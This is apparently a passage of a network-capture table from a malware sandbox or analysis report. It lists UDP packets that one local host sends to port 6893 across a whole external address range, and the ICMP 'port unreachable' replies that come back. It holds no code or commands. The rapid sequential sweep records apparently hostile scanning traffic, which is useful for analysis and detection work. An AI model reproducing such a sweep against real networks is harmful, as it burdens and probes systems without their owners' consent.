Sep 29, 2022 14:50:48.152121067 CEST	59084	6893	192.168.2.6	87.98.179.100
Sep 29, 2022 14:50:48.152131081 CEST	59084	6893	192.168.2.6	87.98.179.101
Sep 29, 2022 14:50:48.152210951 CEST	59084	6893	192.168.2.6	87.98.179.102
Sep 29, 2022 14:50:48.152338982 CEST	59084	6893	192.168.2.6	87.98.179.103
Sep 29, 2022 14:50:48.152448893 CEST	59084	6893	192.168.2.6	87.98.179.104
Sep 29, 2022 14:50:48.152592897 CEST	59084	6893	192.168.2.6	87.98.179.105
Sep 29, 2022 14:50:48.152740002 CEST	59084	6893	192.168.2.6	87.98.179.106
Sep 29, 2022 14:50:48.152956963 CEST	59084	6893	192.168.2.6	87.98.179.107
Sep 29, 2022 14:50:48.153080940 CEST	59084	6893	192.168.2.6	87.98.179.109
Sep 29, 2022 14:50:48.153081894 CEST	59084	6893	192.168.2.6	87.98.179.108
Sep 29, 2022 14:50:48.153182983 CEST	59084	6893	192.168.2.6	87.98.179.110
Sep 29, 2022 14:50:48.153260946 CEST	59084	6893	192.168.2.6	87.98.179.111
Sep 29, 2022 14:50:48.153342009 CEST	59084	6893	192.168.2.6	87.98.179.112
Sep 29, 2022 14:50:48.153455973 CEST	59084	6893	192.168.2.6	87.98.179.113
Sep 29, 2022 14:50:48.153606892 CEST	59084	6893	192.168.2.6	87.98.179.114
Sep 29, 2022 14:50:48.153804064 CEST	59084	6893	192.168.2.6	87.98.179.115
Sep 29, 2022 14:50:48.153939962 CEST	59084	6893	192.168.2.6	87.98.179.116
Sep 29, 2022 14:50:48.154129982 CEST	59084	6893	192.168.2.6	87.98.179.117
Sep 29, 2022 14:50:48.154172897 CEST	59084	6893	192.168.2.6	87.98.179.118
Sep 29, 2022 14:50:48.154270887 CEST	59084	6893	192.168.2.6	87.98.179.119
Sep 29, 2022 14:50:48.154354095 CEST	59084	6893	192.168.2.6	87.98.179.120
Sep 29, 2022 14:50:48.154460907 CEST	59084	6893	192.168.2.6	87.98.179.121
Sep 29, 2022 14:50:48.154644012 CEST	59084	6893	192.168.2.6	87.98.179.123
Sep 29, 2022 14:50:48.154654980 CEST	59084	6893	192.168.2.6	87.98.179.122
Sep 29, 2022 14:50:48.154797077 CEST	59084	6893	192.168.2.6	87.98.179.124
Sep 29, 2022 14:50:48.154916048 CEST	59084	6893	192.168.2.6	87.98.179.125
Sep 29, 2022 14:50:48.154984951 CEST	59084	6893	192.168.2.6	87.98.179.126
Sep 29, 2022 14:50:48.155107975 CEST	59084	6893	192.168.2.6	87.98.179.127
Sep 29, 2022 14:50:48.155236959 CEST	59084	6893	192.168.2.6	87.98.179.128
Sep 29, 2022 14:50:48.155323029 CEST	59084	6893	192.168.2.6	87.98.179.129
Sep 29, 2022 14:50:48.155384064 CEST	59084	6893	192.168.2.6	87.98.179.130
Sep 29, 2022 14:50:48.155452967 CEST	59084	6893	192.168.2.6	87.98.179.131
Sep 29, 2022 14:50:48.155559063 CEST	59084	6893	192.168.2.6	87.98.179.132
Sep 29, 2022 14:50:48.155678988 CEST	59084	6893	192.168.2.6	87.98.179.133
Sep 29, 2022 14:50:48.155874968 CEST	59084	6893	192.168.2.6	87.98.179.135
Sep 29, 2022 14:50:48.155920982 CEST	59084	6893	192.168.2.6	87.98.179.134
Sep 29, 2022 14:50:48.155985117 CEST	59084	6893	192.168.2.6	87.98.179.136
Sep 29, 2022 14:50:48.156176090 CEST	59084	6893	192.168.2.6	87.98.179.138
Sep 29, 2022 14:50:48.156229973 CEST	59084	6893	192.168.2.6	87.98.179.137
Sep 29, 2022 14:50:48.156269073 CEST	59084	6893	192.168.2.6	87.98.179.139
Sep 29, 2022 14:50:48.156390905 CEST	59084	6893	192.168.2.6	87.98.179.140
Sep 29, 2022 14:50:48.156481981 CEST	59084	6893	192.168.2.6	87.98.179.141
Sep 29, 2022 14:50:48.156586885 CEST	59084	6893	192.168.2.6	87.98.179.142
Sep 29, 2022 14:50:48.156689882 CEST	59084	6893	192.168.2.6	87.98.179.143
Sep 29, 2022 14:50:48.156877995 CEST	59084	6893	192.168.2.6	87.98.179.144
Sep 29, 2022 14:50:48.156997919 CEST	59084	6893	192.168.2.6	87.98.179.145
Sep 29, 2022 14:50:48.157113075 CEST	59084	6893	192.168.2.6	87.98.179.146
Sep 29, 2022 14:50:48.157217026 CEST	59084	6893	192.168.2.6	87.98.179.147
Sep 29, 2022 14:50:48.157280922 CEST	59084	6893	192.168.2.6	87.98.179.148
Sep 29, 2022 14:50:48.157362938 CEST	59084	6893	192.168.2.6	87.98.179.149
Sep 29, 2022 14:50:48.157480001 CEST	59084	6893	192.168.2.6	87.98.179.150
Sep 29, 2022 14:50:48.157675028 CEST	59084	6893	192.168.2.6	87.98.179.151
Sep 29, 2022 14:50:48.157675982 CEST	59084	6893	192.168.2.6	87.98.179.152
Sep 29, 2022 14:50:48.157793045 CEST	59084	6893	192.168.2.6	87.98.179.153
Sep 29, 2022 14:50:48.157907963 CEST	59084	6893	192.168.2.6	87.98.179.154
Sep 29, 2022 14:50:48.158037901 CEST	59084	6893	192.168.2.6	87.98.179.155
Sep 29, 2022 14:50:48.158147097 CEST	59084	6893	192.168.2.6	87.98.179.156
Sep 29, 2022 14:50:48.158216953 CEST	59084	6893	192.168.2.6	87.98.179.157
Sep 29, 2022 14:50:48.158310890 CEST	59084	6893	192.168.2.6	87.98.179.158
Sep 29, 2022 14:50:48.158411026 CEST	59084	6893	192.168.2.6	87.98.179.159
Sep 29, 2022 14:50:48.158518076 CEST	59084	6893	192.168.2.6	87.98.179.160
Sep 29, 2022 14:50:48.158694983 CEST	59084	6893	192.168.2.6	87.98.179.161
Sep 29, 2022 14:50:48.158835888 CEST	59084	6893	192.168.2.6	87.98.179.162
Sep 29, 2022 14:50:48.158951044 CEST	59084	6893	192.168.2.6	87.98.179.163
Sep 29, 2022 14:50:48.253737926 CEST	59084	6893	192.168.2.6	87.98.179.164
Sep 29, 2022 14:50:48.253971100 CEST	59084	6893	192.168.2.6	87.98.179.165
Sep 29, 2022 14:50:48.254163980 CEST	59084	6893	192.168.2.6	87.98.179.166
Sep 29, 2022 14:50:48.254221916 CEST	59084	6893	192.168.2.6	87.98.179.167
Sep 29, 2022 14:50:48.254302979 CEST	59084	6893	192.168.2.6	87.98.179.168
Sep 29, 2022 14:50:48.254703999 CEST	59084	6893	192.168.2.6	87.98.179.170
Sep 29, 2022 14:50:48.254920959 CEST	59084	6893	192.168.2.6	87.98.179.169
Sep 29, 2022 14:50:48.255009890 CEST	59084	6893	192.168.2.6	87.98.179.171
Sep 29, 2022 14:50:48.255057096 CEST	59084	6893	192.168.2.6	87.98.179.172
Sep 29, 2022 14:50:48.255182981 CEST	59084	6893	192.168.2.6	87.98.179.173
Sep 29, 2022 14:50:48.255316973 CEST	59084	6893	192.168.2.6	87.98.179.174
Sep 29, 2022 14:50:48.256685972 CEST	59084	6893	192.168.2.6	87.98.179.175
Sep 29, 2022 14:50:48.256999969 CEST	59084	6893	192.168.2.6	87.98.179.176
Sep 29, 2022 14:50:48.257129908 CEST	59084	6893	192.168.2.6	87.98.179.177
Sep 29, 2022 14:50:48.257272005 CEST	59084	6893	192.168.2.6	87.98.179.178
Sep 29, 2022 14:50:48.258483887 CEST	59084	6893	192.168.2.6	87.98.179.179
Sep 29, 2022 14:50:48.258982897 CEST	59084	6893	192.168.2.6	87.98.179.180
Sep 29, 2022 14:50:48.259155989 CEST	59084	6893	192.168.2.6	87.98.179.181
Sep 29, 2022 14:50:48.259277105 CEST	59084	6893	192.168.2.6	87.98.179.182
Sep 29, 2022 14:50:48.259618044 CEST	59084	6893	192.168.2.6	87.98.179.183
Sep 29, 2022 14:50:48.259618044 CEST	59084	6893	192.168.2.6	87.98.179.184
Sep 29, 2022 14:50:48.259732008 CEST	59084	6893	192.168.2.6	87.98.179.185
Sep 29, 2022 14:50:48.259921074 CEST	59084	6893	192.168.2.6	87.98.179.186
Sep 29, 2022 14:50:48.260075092 CEST	59084	6893	192.168.2.6	87.98.179.187
Sep 29, 2022 14:50:48.260215044 CEST	59084	6893	192.168.2.6	87.98.179.188
Sep 29, 2022 14:50:48.260391951 CEST	59084	6893	192.168.2.6	87.98.179.189
Sep 29, 2022 14:50:48.260541916 CEST	59084	6893	192.168.2.6	87.98.179.190
Sep 29, 2022 14:50:48.260739088 CEST	59084	6893	192.168.2.6	87.98.179.191
Sep 29, 2022 14:50:48.260885000 CEST	59084	6893	192.168.2.6	87.98.179.192
Sep 29, 2022 14:50:48.261079073 CEST	59084	6893	192.168.2.6	87.98.179.193
Sep 29, 2022 14:50:48.261229992 CEST	59084	6893	192.168.2.6	87.98.179.194
Sep 29, 2022 14:50:48.261409998 CEST	59084	6893	192.168.2.6	87.98.179.195
Sep 29, 2022 14:50:48.261595011 CEST	59084	6893	192.168.2.6	87.98.179.196
Sep 29, 2022 14:50:48.261770010 CEST	59084	6893	192.168.2.6	87.98.179.197
Sep 29, 2022 14:50:48.263001919 CEST	59084	6893	192.168.2.6	87.98.179.198
Sep 29, 2022 14:50:48.263103008 CEST	59084	6893	192.168.2.6	87.98.179.199
Sep 29, 2022 14:50:48.263222933 CEST	59084	6893	192.168.2.6	87.98.179.200
Sep 29, 2022 14:50:48.263585091 CEST	59084	6893	192.168.2.6	87.98.179.202
Sep 29, 2022 14:50:48.263808012 CEST	59084	6893	192.168.2.6	87.98.179.201
Sep 29, 2022 14:50:48.263972044 CEST	59084	6893	192.168.2.6	87.98.179.203
Sep 29, 2022 14:50:48.264214039 CEST	59084	6893	192.168.2.6	87.98.179.204
Sep 29, 2022 14:50:48.264415026 CEST	59084	6893	192.168.2.6	87.98.179.205
Sep 29, 2022 14:50:48.264590979 CEST	59084	6893	192.168.2.6	87.98.179.206
Sep 29, 2022 14:50:48.267945051 CEST	59084	6893	192.168.2.6	87.98.179.207
Sep 29, 2022 14:50:48.268424034 CEST	59084	6893	192.168.2.6	87.98.179.208
Sep 29, 2022 14:50:48.268600941 CEST	59084	6893	192.168.2.6	87.98.179.209
Sep 29, 2022 14:50:48.268728018 CEST	59084	6893	192.168.2.6	87.98.179.210
Sep 29, 2022 14:50:48.268817902 CEST	59084	6893	192.168.2.6	87.98.179.211
Sep 29, 2022 14:50:48.269071102 CEST	59084	6893	192.168.2.6	87.98.179.212
Sep 29, 2022 14:50:48.269216061 CEST	59084	6893	192.168.2.6	87.98.179.213
Sep 29, 2022 14:50:48.269464970 CEST	59084	6893	192.168.2.6	87.98.179.214
Sep 29, 2022 14:50:48.269670963 CEST	59084	6893	192.168.2.6	87.98.179.215
Sep 29, 2022 14:50:48.269787073 CEST	59084	6893	192.168.2.6	87.98.179.216
Sep 29, 2022 14:50:48.269864082 CEST	59084	6893	192.168.2.6	87.98.179.217
Sep 29, 2022 14:50:48.270011902 CEST	59084	6893	192.168.2.6	87.98.179.218
Sep 29, 2022 14:50:48.270176888 CEST	59084	6893	192.168.2.6	87.98.179.219
Sep 29, 2022 14:50:48.270345926 CEST	59084	6893	192.168.2.6	87.98.179.220
Sep 29, 2022 14:50:48.270509958 CEST	59084	6893	192.168.2.6	87.98.179.221
Sep 29, 2022 14:50:48.270646095 CEST	59084	6893	192.168.2.6	87.98.179.222
Sep 29, 2022 14:50:48.270827055 CEST	59084	6893	192.168.2.6	87.98.179.223
Sep 29, 2022 14:50:48.270948887 CEST	59084	6893	192.168.2.6	87.98.179.224
Sep 29, 2022 14:50:48.276830912 CEST	59084	6893	192.168.2.6	87.98.179.225
Sep 29, 2022 14:50:48.276961088 CEST	59084	6893	192.168.2.6	87.98.179.226
Sep 29, 2022 14:50:48.277101994 CEST	59084	6893	192.168.2.6	87.98.179.227
Sep 29, 2022 14:50:48.277235031 CEST	59084	6893	192.168.2.6	87.98.179.228
Sep 29, 2022 14:50:48.277360916 CEST	59084	6893	192.168.2.6	87.98.179.229
Sep 29, 2022 14:50:48.277498007 CEST	59084	6893	192.168.2.6	87.98.179.230
Sep 29, 2022 14:50:48.277575970 CEST	59084	6893	192.168.2.6	87.98.179.231
Sep 29, 2022 14:50:48.277699947 CEST	59084	6893	192.168.2.6	87.98.179.232
Sep 29, 2022 14:50:48.277843952 CEST	59084	6893	192.168.2.6	87.98.179.233
Sep 29, 2022 14:50:48.277992964 CEST	59084	6893	192.168.2.6	87.98.179.234
Sep 29, 2022 14:50:48.278099060 CEST	59084	6893	192.168.2.6	87.98.179.235
Sep 29, 2022 14:50:48.278204918 CEST	59084	6893	192.168.2.6	87.98.179.236
Sep 29, 2022 14:50:48.278306007 CEST	59084	6893	192.168.2.6	87.98.179.237
Sep 29, 2022 14:50:48.278417110 CEST	59084	6893	192.168.2.6	87.98.179.238
Sep 29, 2022 14:50:48.369240046 CEST	59084	6893	192.168.2.6	87.98.179.239
Sep 29, 2022 14:50:48.369446993 CEST	59084	6893	192.168.2.6	87.98.179.240
Sep 29, 2022 14:50:48.369517088 CEST	59084	6893	192.168.2.6	87.98.179.241
Sep 29, 2022 14:50:48.369595051 CEST	59084	6893	192.168.2.6	87.98.179.242
Sep 29, 2022 14:50:48.369678974 CEST	59084	6893	192.168.2.6	87.98.179.243
Sep 29, 2022 14:50:48.371186972 CEST	59084	6893	192.168.2.6	87.98.179.244
Sep 29, 2022 14:50:48.371354103 CEST	59084	6893	192.168.2.6	87.98.179.245
Sep 29, 2022 14:50:48.371454954 CEST	59084	6893	192.168.2.6	87.98.179.246
Sep 29, 2022 14:50:48.371587992 CEST	59084	6893	192.168.2.6	87.98.179.247
Sep 29, 2022 14:50:48.371711016 CEST	59084	6893	192.168.2.6	87.98.179.248
Sep 29, 2022 14:50:48.371864080 CEST	59084	6893	192.168.2.6	87.98.179.249
Sep 29, 2022 14:50:48.371957064 CEST	59084	6893	192.168.2.6	87.98.179.250
Sep 29, 2022 14:50:48.372101068 CEST	59084	6893	192.168.2.6	87.98.179.251
Sep 29, 2022 14:50:48.372235060 CEST	59084	6893	192.168.2.6	87.98.179.252
Sep 29, 2022 14:50:48.372349977 CEST	59084	6893	192.168.2.6	87.98.179.253
Sep 29, 2022 14:50:48.372488022 CEST	59084	6893	192.168.2.6	87.98.179.254
Sep 29, 2022 14:50:49.410053015 CEST	59084	6893	192.168.2.6	87.98.179.255

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Sep 29, 2022 14:50:10.511076927 CEST	192.168.2.1	192.168.2.6	827b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:13.612149954 CEST	192.168.2.1	192.168.2.6	827b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:19.613137007 CEST	192.168.2.1	192.168.2.6	827b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.581685066 CEST	87.98.176.34	192.168.2.6	c75b	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:24.582001925 CEST	87.98.176.39	192.168.2.6	c767	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.583929062 CEST	87.98.176.1	192.168.2.6	c741	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.584527969 CEST	87.98.176.9	192.168.2.6	c749	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.584685087 CEST	87.98.176.7	192.168.2.6	c747	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.584842920 CEST	87.98.176.8	192.168.2.6	c748	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.584863901 CEST	87.98.176.15	192.168.2.6	c74f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.585197926 CEST	87.98.176.14	192.168.2.6	c747	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:24.585575104 CEST	87.98.176.10	192.168.2.6	c74a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.585597038 CEST	87.98.176.11	192.168.2.6	c74b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.585897923 CEST	87.98.176.16	192.168.2.6	c750	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.586244106 CEST	87.98.176.17	192.168.2.6	c751	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.588161945 CEST	87.98.176.24	192.168.2.6	c758	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.588186026 CEST	87.98.176.33	192.168.2.6	c761	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.588532925 CEST	87.98.176.25	192.168.2.6	c759	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.588593960 CEST	87.98.176.27	192.168.2.6	c75b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.588937998 CEST	87.98.176.35	192.168.2.6	c763	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.589468002 CEST	87.98.176.38	192.168.2.6	c766	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.590583086 CEST	87.98.176.42	192.168.2.6	c76a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.591609001 CEST	87.98.176.90	192.168.2.6	c79a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.592250109 CEST	87.98.176.53	192.168.2.6	c775	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.592732906 CEST	87.98.176.55	192.168.2.6	c777	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.592789888 CEST	87.98.176.58	192.168.2.6	c77a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.596925974 CEST	87.98.176.74	192.168.2.6	c78a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.598428011 CEST	87.98.176.82	192.168.2.6	c792	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.598475933 CEST	87.98.176.83	192.168.2.6	c793	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.598684072 CEST	87.98.176.85	192.168.2.6	c795	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.600456953 CEST	87.98.176.92	192.168.2.6	c795	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:24.600816965 CEST	87.98.176.99	192.168.2.6	c7a3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.600893021 CEST	87.98.176.102	192.168.2.6	c79f	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:24.602725029 CEST	87.98.176.113	192.168.2.6	c7b1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.603183985 CEST	87.98.176.114	192.168.2.6	c7b2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.603202105 CEST	87.98.176.116	192.168.2.6	c7b4	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.603399992 CEST	87.98.176.110	192.168.2.6	c7ae	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.603429079 CEST	87.98.176.151	192.168.2.6	c7d7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.604213953 CEST	87.98.176.117	192.168.2.6	c7ae	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:24.604566097 CEST	87.98.176.122	192.168.2.6	c7ba	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.606057882 CEST	87.98.176.124	192.168.2.6	c7bc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.606158972 CEST	87.98.176.130	192.168.2.6	c7c2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.608103037 CEST	87.98.176.190	192.168.2.6	c7fe	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.608273983 CEST	87.98.176.142	192.168.2.6	c7ce	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.609436035 CEST	87.98.176.147	192.168.2.6	c7d3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.610559940 CEST	87.98.176.200	192.168.2.6	c808	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.611068010 CEST	87.98.176.150	192.168.2.6	c7d6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.611282110 CEST	87.98.176.158	192.168.2.6	c7de	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.611371040 CEST	87.98.176.156	192.168.2.6	c7dc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.612030029 CEST	87.98.176.164	192.168.2.6	c7e4	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.612571955 CEST	87.98.176.163	192.168.2.6	c7e3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.612591982 CEST	87.98.176.215	192.168.2.6	c817	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.613446951 CEST	87.98.176.221	192.168.2.6	c81d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.613466024 CEST	87.98.176.171	192.168.2.6	c7eb	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.613569021 CEST	87.98.176.169	192.168.2.6	c7e9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.614437103 CEST	87.98.176.185	192.168.2.6	c7f9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.614460945 CEST	87.98.176.178	192.168.2.6	c7f2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.615144014 CEST	87.98.176.184	192.168.2.6	c7f8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.618052006 CEST	87.98.176.196	192.168.2.6	c804	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.618185997 CEST	87.98.176.193	192.168.2.6	c801	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.618427038 CEST	87.98.176.203	192.168.2.6	c80b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.619157076 CEST	87.98.176.210	192.168.2.6	c812	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.619211912 CEST	87.98.176.206	192.168.2.6	c80e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.619461060 CEST	87.98.176.195	192.168.2.6	c803	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.621149063 CEST	87.98.176.219	192.168.2.6	c81b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.621385098 CEST	87.98.176.220	192.168.2.6	c81c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.621448994 CEST	87.98.176.224	192.168.2.6	c820	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.621692896 CEST	87.98.176.225	192.168.2.6	c821	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.622361898 CEST	87.98.176.227	192.168.2.6	c819	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:24.631953955 CEST	87.98.176.234	192.168.2.6	c82a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.632549047 CEST	87.98.176.236	192.168.2.6	c82c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.633186102 CEST	87.98.176.239	192.168.2.6	c82f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.633479118 CEST	87.98.176.241	192.168.2.6	c831	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.633593082 CEST	87.98.176.242	192.168.2.6	c832	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.633624077 CEST	87.98.176.243	192.168.2.6	c82c	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:24.633990049 CEST	87.98.176.248	192.168.2.6	c838	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:24.634471893 CEST	87.98.176.246	192.168.2.6	c82f	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:24.636595964 CEST	87.98.176.254	192.168.2.6	c83e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.666177988 CEST	87.98.177.4	192.168.2.6	c844	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.666697979 CEST	87.98.177.9	192.168.2.6	c849	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.667300940 CEST	87.98.177.47	192.168.2.6	c86f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.667835951 CEST	87.98.177.6	192.168.2.6	c846	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.667926073 CEST	87.98.177.13	192.168.2.6	c84d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.667952061 CEST	87.98.177.21	192.168.2.6	c855	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.668597937 CEST	87.98.177.23	192.168.2.6	c857	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.668628931 CEST	87.98.177.20	192.168.2.6	c854	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.669507027 CEST	87.98.177.26	192.168.2.6	c85a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.670691013 CEST	87.98.177.83	192.168.2.6	c893	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.671293974 CEST	87.98.177.35	192.168.2.6	c863	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.671652079 CEST	87.98.177.39	192.168.2.6	c867	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.671885967 CEST	87.98.177.88	192.168.2.6	c898	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.674613953 CEST	87.98.177.107	192.168.2.6	c8a1	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:25.674689054 CEST	87.98.177.48	192.168.2.6	c870	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.675034046 CEST	87.98.177.44	192.168.2.6	c86c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.675641060 CEST	87.98.177.41	192.168.2.6	c869	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.675674915 CEST	87.98.177.61	192.168.2.6	c876	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:25.675787926 CEST	87.98.177.59	192.168.2.6	c87b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.676136971 CEST	87.98.177.63	192.168.2.6	c87f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.676364899 CEST	87.98.177.62	192.168.2.6	c87e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.676476002 CEST	87.98.177.71	192.168.2.6	c887	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.676877022 CEST	87.98.177.73	192.168.2.6	c889	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.676934958 CEST	87.98.177.67	192.168.2.6	c883	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.677000046 CEST	87.98.177.69	192.168.2.6	c885	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.677242994 CEST	87.98.177.79	192.168.2.6	c88f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.677489996 CEST	87.98.177.135	192.168.2.6	c8c7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.677732944 CEST	87.98.177.75	192.168.2.6	c88b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.679265022 CEST	87.98.177.81	192.168.2.6	c891	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.679286003 CEST	87.98.177.86	192.168.2.6	c896	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.679569960 CEST	87.98.177.89	192.168.2.6	c899	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.680358887 CEST	87.98.177.92	192.168.2.6	c89c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.680382967 CEST	87.98.177.95	192.168.2.6	c89f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.680433989 CEST	87.98.177.96	192.168.2.6	c8a0	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.682312965 CEST	87.98.177.108	192.168.2.6	c8ac	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.682553053 CEST	87.98.177.116	192.168.2.6	c8b4	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.682748079 CEST	87.98.177.102	192.168.2.6	c8a6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.682775021 CEST	87.98.177.109	192.168.2.6	c8ad	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.683510065 CEST	87.98.177.115	192.168.2.6	c8b3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.683907032 CEST	87.98.177.110	192.168.2.6	c8ae	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.683974981 CEST	87.98.177.126	192.168.2.6	c8be	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.684211016 CEST	87.98.177.1	192.168.2.6	c841	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.684233904 CEST	87.98.177.124	192.168.2.6	c8bc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.685087919 CEST	87.98.177.132	192.168.2.6	c8c4	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.685414076 CEST	87.98.177.165	192.168.2.6	c8e5	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.687052011 CEST	87.98.177.137	192.168.2.6	c8c9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.687088966 CEST	87.98.177.141	192.168.2.6	c8cd	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.687882900 CEST	87.98.177.142	192.168.2.6	c8ce	(Port unreachable)	Destination Unreachable
